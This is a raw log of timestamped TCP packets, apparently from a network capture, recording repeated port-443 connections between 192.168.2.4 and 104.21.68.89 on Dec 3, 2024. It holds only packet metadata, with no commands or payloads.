                                                                                                                                                                              Dec 3, 2024 17:45:17.624819040 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.769922972 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.769953966 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.770016909 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.770047903 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.770077944 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.770097971 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.777040958 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.777062893 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.777097940 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.777105093 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.777132034 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.777151108 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.784322977 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.784344912 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.784375906 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.784385920 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.784413099 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.784430981 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.792620897 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.792642117 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.792678118 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.792686939 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.792717934 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.792736053 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.800513983 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.800534964 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.800574064 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.800585032 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.800615072 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.800632954 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.808247089 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.808264971 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.808320999 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.808337927 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.808391094 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.816349983 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.816373110 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.816417933 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.816431999 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.816459894 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.816478968 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.824359894 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.824379921 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.824433088 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.824443102 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.824472904 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.824492931 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.971676111 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.971698046 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.971743107 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.971765995 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.971779108 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.971818924 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.977894068 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.977920055 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.977988005 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.977994919 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.978035927 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.986100912 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.986146927 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.986174107 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.986181021 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.986202955 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.986227989 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.994142056 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.994167089 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.994245052 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.994245052 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:17.994251966 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:17.994288921 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.002245903 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.002264977 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.002316952 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.002324104 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.002377033 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.009932995 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.009978056 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.010004997 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.010011911 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.010042906 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.010082960 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.017160892 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.017184973 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.017276049 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.017282963 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.017324924 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.025307894 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.025341034 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.025376081 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.025382042 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.025418997 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.025439024 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.177294016 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.177315950 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.177398920 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.177438021 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.177454948 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.177534103 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.184684992 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.184709072 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.184748888 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.184758902 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.184803009 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.184906006 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.191787958 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.191812038 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.191910028 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.191917896 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.192020893 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.199970007 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.199995041 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.200054884 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.200068951 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.200078964 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.200160980 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.208070993 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.208095074 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.208182096 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.208200932 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.208257914 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.215652943 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.215676069 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.215734005 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.215744019 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.215791941 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.215818882 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.223829985 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.223881960 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.223911047 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.223918915 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.223975897 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.223975897 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.230952024 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.230978966 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.231056929 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.231067896 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.231103897 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.231103897 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.374236107 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.374268055 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.374608040 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.374643087 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.375036955 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.377017021 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.377140045 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:18.377173901 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:18.379056931 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:19.175230980 CET49904443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:19.175275087 CET44349904104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:19.302939892 CET49918443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:19.302989006 CET44349918104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:19.303349972 CET49918443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:19.303715944 CET49918443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:19.303729057 CET44349918104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:20.563930035 CET44349918104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:20.564002991 CET49918443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:20.564464092 CET49918443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:20.564474106 CET44349918104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:20.564706087 CET49918443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:20.564712048 CET44349918104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:22.185682058 CET44349918104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:22.185735941 CET49918443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:22.185765028 CET44349918104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:22.185811996 CET49918443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:22.185847044 CET44349918104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:22.185889006 CET49918443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:22.188838959 CET49918443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:22.188858032 CET44349918104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:22.208265066 CET49926443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:22.208374023 CET44349926104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:22.208451986 CET49926443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:22.208758116 CET49926443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:22.208786964 CET44349926104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:23.534934044 CET44349926104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:23.534991980 CET49926443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:23.619690895 CET49926443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:23.619710922 CET44349926104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:23.620019913 CET49926443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:23.620024920 CET44349926104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:25.106945038 CET44349926104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:25.107039928 CET44349926104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:25.107079029 CET49926443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:25.107153893 CET49926443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:25.110496998 CET49926443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:25.110519886 CET44349926104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:25.277081966 CET49933443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:25.277143955 CET44349933104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:25.277236938 CET49933443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:25.278156042 CET49933443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:25.278170109 CET44349933104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:26.493360996 CET44349933104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:26.493486881 CET49933443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:26.494014025 CET49933443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:26.494026899 CET44349933104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:26.496655941 CET49933443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:26.496665001 CET44349933104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:28.142390966 CET44349933104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:28.142465115 CET49933443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:28.142493963 CET44349933104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:28.142535925 CET49933443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:28.142537117 CET44349933104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:28.142574072 CET49933443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:28.147654057 CET49933443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:28.147671938 CET44349933104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:28.238940954 CET49940443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:28.238982916 CET44349940104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:28.239319086 CET49940443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:28.239707947 CET49940443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:28.239722967 CET44349940104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:29.460340977 CET44349940104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:29.462059021 CET49940443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:29.479140043 CET49940443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:29.479159117 CET44349940104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:29.479446888 CET49940443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:29.479454041 CET44349940104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:31.051011086 CET44349940104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:31.051089048 CET49940443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:31.051099062 CET44349940104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:31.051146984 CET49940443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:31.054059982 CET49940443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:31.054076910 CET44349940104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:31.142569065 CET49948443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:31.142611027 CET44349948104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:31.142826080 CET49948443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:31.143203020 CET49948443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:31.143217087 CET44349948104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:32.416184902 CET44349948104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:32.419083118 CET49948443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:32.588783026 CET49948443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:32.588797092 CET44349948104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:32.589134932 CET49948443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:32.589139938 CET44349948104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:34.078041077 CET44349948104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:34.078155041 CET44349948104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:34.078170061 CET49948443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:34.078200102 CET49948443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:34.078737974 CET49948443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:34.078752995 CET44349948104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:34.084980011 CET49956443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:34.085011959 CET44349956104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:34.085064888 CET49956443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:34.085371971 CET49956443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:34.085382938 CET44349956104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:35.304297924 CET44349956104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:35.304374933 CET49956443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:35.305067062 CET49956443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:35.305067062 CET49956443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:35.305079937 CET44349956104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:35.305094957 CET44349956104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:35.305160046 CET49956443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:35.305175066 CET44349956104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:36.853348970 CET44349956104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:36.853508949 CET44349956104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:36.853530884 CET49956443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:36.853848934 CET49956443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:36.853935003 CET49956443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:36.853955984 CET44349956104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:36.946923018 CET49962443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:36.946983099 CET44349962104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:36.949275970 CET49962443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:36.949384928 CET49962443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:36.949394941 CET44349962104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:38.218807936 CET44349962104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:38.218907118 CET49962443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:38.219487906 CET49962443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:38.219494104 CET44349962104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:38.219856977 CET49962443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:38.219861984 CET44349962104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:39.863642931 CET44349962104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:39.863687038 CET49962443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:39.863694906 CET44349962104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:39.863729000 CET49962443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:39.863733053 CET44349962104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:39.863765001 CET49962443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:39.863797903 CET44349962104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:39.863831043 CET49962443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:39.868086100 CET49962443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:39.868099928 CET44349962104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:40.282032967 CET49972443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:40.282068968 CET44349972104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:40.282124996 CET49972443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:40.282407045 CET49972443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:40.282419920 CET44349972104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:41.613826990 CET44349972104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:41.613892078 CET49972443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:41.614547014 CET49972443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:41.614557981 CET44349972104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:41.614748001 CET49972443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:41.614756107 CET44349972104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:43.254853010 CET44349972104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:43.254987001 CET44349972104.21.68.89192.168.2.4
                                                                                                                                                                              Dec 3, 2024 17:45:43.254985094 CET49972443192.168.2.4104.21.68.89
                                                                                                                                                                              Dec 3, 2024 17:45:43.255158901 CET49972443192.168.2.4104.21.68.89
